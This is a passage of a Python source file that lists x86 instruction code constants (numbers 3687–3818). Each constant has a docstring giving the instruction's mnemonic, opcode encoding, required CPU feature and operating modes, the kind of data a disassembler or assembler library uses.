"""
``PDEP r64a, r64b, r/m64``
``VEX.LZ.F2.0F38.W1 F5 /r``
``BMI2``
``64-bit``
"""
WRSSD_M32_R32: int = 3687
"""
``WRSSD m32, r32``
``NP 0F 38 F6 /r``
``CET_SS``
``16/32/64-bit``
"""
WRSSQ_M64_R64: int = 3688
"""
``WRSSQ m64, r64``
``NP o64 0F 38 F6 /r``
``CET_SS``
``64-bit``
"""
ADCX_R32_RM32: int = 3689
"""
``ADCX r32, r/m32``
``66 0F 38 F6 /r``
``ADX``
``16/32/64-bit``
"""
ADCX_R64_RM64: int = 3690
"""
``ADCX r64, r/m64``
``66 o64 0F 38 F6 /r``
``ADX``
``64-bit``
"""
ADOX_R32_RM32: int = 3691
"""
``ADOX r32, r/m32``
``F3 0F 38 F6 /r``
``ADX``
``16/32/64-bit``
"""
ADOX_R64_RM64: int = 3692
"""
``ADOX r64, r/m64``
``F3 o64 0F 38 F6 /r``
``ADX``
``64-bit``
"""
VEX_MULX_R32_R32_RM32: int = 3693
"""
``MULX r32a, r32b, r/m32``
``VEX.LZ.F2.0F38.W0 F6 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_MULX_R64_R64_RM64: int = 3694
"""
``MULX r64a, r64b, r/m64``
``VEX.LZ.F2.0F38.W1 F6 /r``
``BMI2``
``64-bit``
"""
VEX_BEXTR_R32_RM32_R32: int = 3695
"""
``BEXTR r32a, r/m32, r32b``
``VEX.LZ.0F38.W0 F7 /r``
``BMI1``
``16/32/64-bit``
"""
VEX_BEXTR_R64_RM64_R64: int = 3696
"""
``BEXTR r64a, r/m64, r64b``
``VEX.LZ.0F38.W1 F7 /r``
``BMI1``
``64-bit``
"""
VEX_SHLX_R32_RM32_R32: int = 3697
"""
``SHLX r32a, r/m32, r32b``
``VEX.LZ.66.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SHLX_R64_RM64_R64: int = 3698
"""
``SHLX r64a, r/m64, r64b``
``VEX.LZ.66.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
VEX_SARX_R32_RM32_R32: int = 3699
"""
``SARX r32a, r/m32, r32b``
``VEX.LZ.F3.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SARX_R64_RM64_R64: int = 3700
"""
``SARX r64a, r/m64, r64b``
``VEX.LZ.F3.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
VEX_SHRX_R32_RM32_R32: int = 3701
"""
``SHRX r32a, r/m32, r32b``
``VEX.LZ.F2.0F38.W0 F7 /r``
``BMI2``
``16/32/64-bit``
"""
VEX_SHRX_R64_RM64_R64: int = 3702
"""
``SHRX r64a, r/m64, r64b``
``VEX.LZ.F2.0F38.W1 F7 /r``
``BMI2``
``64-bit``
"""
MOVDIR64B_R16_M512: int = 3703
"""
``MOVDIR64B r16, m512``
``a16 66 0F 38 F8 /r``
``MOVDIR64B``
``16/32-bit``
"""
MOVDIR64B_R32_M512: int = 3704
"""
``MOVDIR64B r32, m512``
``a32 66 0F 38 F8 /r``
``MOVDIR64B``
``16/32/64-bit``
"""
MOVDIR64B_R64_M512: int = 3705
"""
``MOVDIR64B r64, m512``
``a64 66 0F 38 F8 /r``
``MOVDIR64B``
``64-bit``
"""
ENQCMDS_R16_M512: int = 3706
"""
``ENQCMDS r16, m512``
``a16 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32-bit``
"""
ENQCMDS_R32_M512: int = 3707
"""
``ENQCMDS r32, m512``
``a32 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32/64-bit``
"""
ENQCMDS_R64_M512: int = 3708
"""
``ENQCMDS r64, m512``
``a64 F3 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``64-bit``
"""
ENQCMD_R16_M512: int = 3709
"""
``ENQCMD r16, m512``
``a16 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32-bit``
"""
ENQCMD_R32_M512: int = 3710
"""
``ENQCMD r32, m512``
``a32 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``16/32/64-bit``
"""
ENQCMD_R64_M512: int = 3711
"""
``ENQCMD r64, m512``
``a64 F2 0F 38 F8 !(11):rrr:bbb``
``ENQCMD``
``64-bit``
"""
MOVDIRI_M32_R32: int = 3712
"""
``MOVDIRI m32, r32``
``NP 0F 38 F9 /r``
``MOVDIRI``
``16/32/64-bit``
"""
MOVDIRI_M64_R64: int = 3713
"""
``MOVDIRI m64, r64``
``NP o64 0F 38 F9 /r``
``MOVDIRI``
``64-bit``
"""
VEX_VPERMQ_YMM_YMMM256_IMM8: int = 3714
"""
``VPERMQ ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W1 00 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMQ_YMM_K1Z_YMMM256B64_IMM8: int = 3715
"""
``VPERMQ ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 00 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 3716
"""
``VPERMQ zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 00 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMPD_YMM_YMMM256_IMM8: int = 3717
"""
``VPERMPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W1 01 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMPD_YMM_K1Z_YMMM256B64_IMM8: int = 3718
"""
``VPERMPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 01 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3719
"""
``VPERMPD zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 01 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPBLENDD_XMM_XMM_XMMM128_IMM8: int = 3720
"""
``VPBLENDD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W0 02 /r ib``
``AVX2``
``16/32/64-bit``
"""
VEX_VPBLENDD_YMM_YMM_YMMM256_IMM8: int = 3721
"""
``VPBLENDD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 02 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VALIGND_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3722
"""
``VALIGND xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGND_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3723
"""
``VALIGND ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGND_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 3724
"""
``VALIGND zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 03 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3725
"""
``VALIGNQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3726
"""
``VALIGNQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 03 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VALIGNQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 3727
"""
``VALIGNQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 03 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPS_XMM_XMMM128_IMM8: int = 3728
"""
``VPERMILPS xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 04 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPS_YMM_YMMM256_IMM8: int = 3729
"""
``VPERMILPS ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W0 04 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPS_XMM_K1Z_XMMM128B32_IMM8: int = 3730
"""
``VPERMILPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 04 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_YMM_K1Z_YMMM256B32_IMM8: int = 3731
"""
``VPERMILPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 04 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPS_ZMM_K1Z_ZMMM512B32_IMM8: int = 3732
"""
``VPERMILPS zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 04 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMILPD_XMM_XMMM128_IMM8: int = 3733
"""
``VPERMILPD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 05 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPERMILPD_YMM_YMMM256_IMM8: int = 3734
"""
``VPERMILPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.W0 05 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VPERMILPD_XMM_K1Z_XMMM128B64_IMM8: int = 3735
"""
``VPERMILPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 05 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_YMM_K1Z_YMMM256B64_IMM8: int = 3736
"""
``VPERMILPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 05 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMILPD_ZMM_K1Z_ZMMM512B64_IMM8: int = 3737
"""
``VPERMILPD zmm1 {k1}{z}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 05 /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERM2F128_YMM_YMM_YMMM256_IMM8: int = 3738
"""
``VPERM2F128 ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W0 06 /r ib``
``AVX``
``16/32/64-bit``
"""
ROUNDPS_XMM_XMMM128_IMM8: int = 3739
"""
``ROUNDPS xmm1, xmm2/m128, imm8``
``66 0F 3A 08 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDPS_XMM_XMMM128_IMM8: int = 3740
"""
``VROUNDPS xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 08 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VROUNDPS_YMM_YMMM256_IMM8: int = 3741
"""
``VROUNDPS ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.WIG 08 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3742
"""
``VRNDSCALEPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 08 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3743
"""
``VRNDSCALEPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 08 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3744
"""
``VRNDSCALEPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 08 /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDPD_XMM_XMMM128_IMM8: int = 3745
"""
``ROUNDPD xmm1, xmm2/m128, imm8``
``66 0F 3A 09 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDPD_XMM_XMMM128_IMM8: int = 3746
"""
``VROUNDPD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 09 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VROUNDPD_YMM_YMMM256_IMM8: int = 3747
"""
``VROUNDPD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F3A.WIG 09 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3748
"""
``VRNDSCALEPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 09 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3749
"""
``VRNDSCALEPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 09 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3750
"""
``VRNDSCALEPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 09 /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDSS_XMM_XMMM32_IMM8: int = 3751
"""
``ROUNDSS xmm1, xmm2/m32, imm8``
``66 0F 3A 0A /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDSS_XMM_XMM_XMMM32_IMM8: int = 3752
"""
``VROUNDSS xmm1, xmm2, xmm3/m32, imm8``
``VEX.LIG.66.0F3A.WIG 0A /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3753
"""
``VRNDSCALESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 0A /r ib``
``AVX512F``
``16/32/64-bit``
"""
ROUNDSD_XMM_XMMM64_IMM8: int = 3754
"""
``ROUNDSD xmm1, xmm2/m64, imm8``
``66 0F 3A 0B /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VROUNDSD_XMM_XMM_XMMM64_IMM8: int = 3755
"""
``VROUNDSD xmm1, xmm2, xmm3/m64, imm8``
``VEX.LIG.66.0F3A.WIG 0B /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VRNDSCALESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3756
"""
``VRNDSCALESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 0B /r ib``
``AVX512F``
``16/32/64-bit``
"""
BLENDPS_XMM_XMMM128_IMM8: int = 3757
"""
``BLENDPS xmm1, xmm2/m128, imm8``
``66 0F 3A 0C /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VBLENDPS_XMM_XMM_XMMM128_IMM8: int = 3758
"""
``VBLENDPS xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0C /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDPS_YMM_YMM_YMMM256_IMM8: int = 3759
"""
``VBLENDPS ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0C /r ib``
``AVX``
``16/32/64-bit``
"""
BLENDPD_XMM_XMMM128_IMM8: int = 3760
"""
``BLENDPD xmm1, xmm2/m128, imm8``
``66 0F 3A 0D /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VBLENDPD_XMM_XMM_XMMM128_IMM8: int = 3761
"""
``VBLENDPD xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0D /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VBLENDPD_YMM_YMM_YMMM256_IMM8: int = 3762
"""
``VBLENDPD ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0D /r ib``
``AVX``
``16/32/64-bit``
"""
PBLENDW_XMM_XMMM128_IMM8: int = 3763
"""
``PBLENDW xmm1, xmm2/m128, imm8``
``66 0F 3A 0E /r ib``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPBLENDW_XMM_XMM_XMMM128_IMM8: int = 3764
"""
``VPBLENDW xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0E /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPBLENDW_YMM_YMM_YMMM256_IMM8: int = 3765
"""
``VPBLENDW ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0E /r ib``
``AVX2``
``16/32/64-bit``
"""
PALIGNR_MM_MMM64_IMM8: int = 3766
"""
``PALIGNR mm1, mm2/m64, imm8``
``NP 0F 3A 0F /r ib``
``SSSE3``
``16/32/64-bit``
"""
PALIGNR_XMM_XMMM128_IMM8: int = 3767
"""
``PALIGNR xmm1, xmm2/m128, imm8``
``66 0F 3A 0F /r ib``
``SSSE3``
``16/32/64-bit``
"""
VEX_VPALIGNR_XMM_XMM_XMMM128_IMM8: int = 3768
"""
``VPALIGNR xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.WIG 0F /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPALIGNR_YMM_YMM_YMMM256_IMM8: int = 3769
"""
``VPALIGNR ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.WIG 0F /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPALIGNR_XMM_K1Z_XMM_XMMM128_IMM8: int = 3770
"""
``VPALIGNR xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.WIG 0F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPALIGNR_YMM_K1Z_YMM_YMMM256_IMM8: int = 3771
"""
``VPALIGNR ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.WIG 0F /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPALIGNR_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 3772
"""
``VPALIGNR zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.WIG 0F /r ib``
``AVX512BW``
``16/32/64-bit``
"""
PEXTRB_R32M8_XMM_IMM8: int = 3773
"""
``PEXTRB r32/m8, xmm2, imm8``
``66 0F 3A 14 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRB_R64M8_XMM_IMM8: int = 3774
"""
``PEXTRB r64/m8, xmm2, imm8``
``66 o64 0F 3A 14 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRB_R32M8_XMM_IMM8: int = 3775
"""
``VPEXTRB r32/m8, xmm2, imm8``
``VEX.128.66.0F3A.W0 14 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRB_R64M8_XMM_IMM8: int = 3776
"""
``VPEXTRB r64/m8, xmm2, imm8``
``VEX.128.66.0F3A.W1 14 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRB_R32M8_XMM_IMM8: int = 3777
"""
``VPEXTRB r32/m8, xmm2, imm8``
``EVEX.128.66.0F3A.W0 14 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRB_R64M8_XMM_IMM8: int = 3778
"""
``VPEXTRB r64/m8, xmm2, imm8``
``EVEX.128.66.0F3A.W1 14 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRW_R32M16_XMM_IMM8: int = 3779
"""
``PEXTRW r32/m16, xmm, imm8``
``66 0F 3A 15 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRW_R64M16_XMM_IMM8: int = 3780
"""
``PEXTRW r64/m16, xmm, imm8``
``66 o64 0F 3A 15 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRW_R32M16_XMM_IMM8: int = 3781
"""
``VPEXTRW r32/m16, xmm2, imm8``
``VEX.128.66.0F3A.W0 15 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRW_R64M16_XMM_IMM8: int = 3782
"""
``VPEXTRW r64/m16, xmm2, imm8``
``VEX.128.66.0F3A.W1 15 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRW_R32M16_XMM_IMM8: int = 3783
"""
``VPEXTRW r32/m16, xmm2, imm8``
``EVEX.128.66.0F3A.W0 15 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPEXTRW_R64M16_XMM_IMM8: int = 3784
"""
``VPEXTRW r64/m16, xmm2, imm8``
``EVEX.128.66.0F3A.W1 15 /r ib``
``AVX512BW``
``64-bit``
"""
PEXTRD_RM32_XMM_IMM8: int = 3785
"""
``PEXTRD r/m32, xmm2, imm8``
``66 0F 3A 16 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
PEXTRQ_RM64_XMM_IMM8: int = 3786
"""
``PEXTRQ r/m64, xmm2, imm8``
``66 o64 0F 3A 16 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VPEXTRD_RM32_XMM_IMM8: int = 3787
"""
``VPEXTRD r/m32, xmm2, imm8``
``VEX.128.66.0F3A.W0 16 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPEXTRQ_RM64_XMM_IMM8: int = 3788
"""
``VPEXTRQ r/m64, xmm2, imm8``
``VEX.128.66.0F3A.W1 16 /r ib``
``AVX``
``64-bit``
"""
EVEX_VPEXTRD_RM32_XMM_IMM8: int = 3789
"""
``VPEXTRD r/m32, xmm2, imm8``
``EVEX.128.66.0F3A.W0 16 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPEXTRQ_RM64_XMM_IMM8: int = 3790
"""
``VPEXTRQ r/m64, xmm2, imm8``
``EVEX.128.66.0F3A.W1 16 /r ib``
``AVX512DQ``
``64-bit``
"""
EXTRACTPS_RM32_XMM_IMM8: int = 3791
"""
``EXTRACTPS r/m32, xmm1, imm8``
``66 0F 3A 17 /r ib``
``SSE4.1``
``16/32/64-bit``
"""
EXTRACTPS_R64M32_XMM_IMM8: int = 3792
"""
``EXTRACTPS r64/m32, xmm1, imm8``
``66 o64 0F 3A 17 /r ib``
``SSE4.1``
``64-bit``
"""
VEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3793
"""
``VEXTRACTPS r/m32, xmm1, imm8``
``VEX.128.66.0F3A.W0 17 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3794
"""
``VEXTRACTPS r64/m32, xmm1, imm8``
``VEX.128.66.0F3A.W1 17 /r ib``
``AVX``
``64-bit``
"""
EVEX_VEXTRACTPS_RM32_XMM_IMM8: int = 3795
"""
``VEXTRACTPS r/m32, xmm1, imm8``
``EVEX.128.66.0F3A.W0 17 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTPS_R64M32_XMM_IMM8: int = 3796
"""
``VEXTRACTPS r64/m32, xmm1, imm8``
``EVEX.128.66.0F3A.W1 17 /r ib``
``AVX512F``
``64-bit``
"""
VEX_VINSERTF128_YMM_YMM_XMMM128_IMM8: int = 3797
"""
``VINSERTF128 ymm1, ymm2, xmm3/m128, imm8``
``VEX.256.66.0F3A.W0 18 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VINSERTF32X4_YMM_K1Z_YMM_XMMM128_IMM8: int = 3798
"""
``VINSERTF32X4 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W0 18 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTF32X4_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3799
"""
``VINSERTF32X4 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W0 18 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VINSERTF64X2_YMM_K1Z_YMM_XMMM128_IMM8: int = 3800
"""
``VINSERTF64X2 ymm1 {k1}{z}, ymm2, xmm3/m128, imm8``
``EVEX.256.66.0F3A.W1 18 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF64X2_ZMM_K1Z_ZMM_XMMM128_IMM8: int = 3801
"""
``VINSERTF64X2 zmm1 {k1}{z}, zmm2, xmm3/m128, imm8``
``EVEX.512.66.0F3A.W1 18 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VEXTRACTF128_XMMM128_YMM_IMM8: int = 3802
"""
``VEXTRACTF128 xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 19 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X4_XMMM128_K1Z_YMM_IMM8: int = 3803
"""
``VEXTRACTF32X4 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 19 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X4_XMMM128_K1Z_ZMM_IMM8: int = 3804
"""
``VEXTRACTF32X4 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 19 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X2_XMMM128_K1Z_YMM_IMM8: int = 3805
"""
``VEXTRACTF64X2 xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W1 19 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X2_XMMM128_K1Z_ZMM_IMM8: int = 3806
"""
``VEXTRACTF64X2 xmm1/m128 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 19 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF32X8_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3807
"""
``VINSERTF32X8 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W0 1A /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VINSERTF64X4_ZMM_K1Z_ZMM_YMMM256_IMM8: int = 3808
"""
``VINSERTF64X4 zmm1 {k1}{z}, zmm2, ymm3/m256, imm8``
``EVEX.512.66.0F3A.W1 1A /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VEXTRACTF32X8_YMMM256_K1Z_ZMM_IMM8: int = 3809
"""
``VEXTRACTF32X8 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W0 1B /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VEXTRACTF64X4_YMMM256_K1Z_ZMM_IMM8: int = 3810
"""
``VEXTRACTF64X4 ymm1/m256 {k1}{z}, zmm2, imm8``
``EVEX.512.66.0F3A.W1 1B /r ib``
``AVX512F``
``16/32/64-bit``
"""
VEX_VCVTPS2PH_XMMM64_XMM_IMM8: int = 3811
"""
``VCVTPS2PH xmm1/m64, xmm2, imm8``
``VEX.128.66.0F3A.W0 1D /r ib``
``F16C``
``16/32/64-bit``
"""
VEX_VCVTPS2PH_XMMM128_YMM_IMM8: int = 3812
"""
``VCVTPS2PH xmm1/m128, ymm2, imm8``
``VEX.256.66.0F3A.W0 1D /r ib``
``F16C``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_XMMM64_K1Z_XMM_IMM8: int = 3813
"""
``VCVTPS2PH xmm1/m64 {k1}{z}, xmm2, imm8``
``EVEX.128.66.0F3A.W0 1D /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_XMMM128_K1Z_YMM_IMM8: int = 3814
"""
``VCVTPS2PH xmm1/m128 {k1}{z}, ymm2, imm8``
``EVEX.256.66.0F3A.W0 1D /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VCVTPS2PH_YMMM256_K1Z_ZMM_IMM8_SAE: int = 3815
"""
``VCVTPS2PH ymm1/m256 {k1}{z}, zmm2{sae}, imm8``
``EVEX.512.66.0F3A.W0 1D /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_XMM_XMMM128B32_IMM8: int = 3816
"""
``VPCMPUD k1 {k2}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_YMM_YMMM256B32_IMM8: int = 3817
"""
``VPCMPUD k1 {k2}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 1E /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPUD_KR_K1_ZMM_ZMMM512B32_IMM8: int = 3818
"""
``VPCMPUD k1 {k2}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 1E /r ib``
``AVX512F``
``16/32/64-bit``
"""
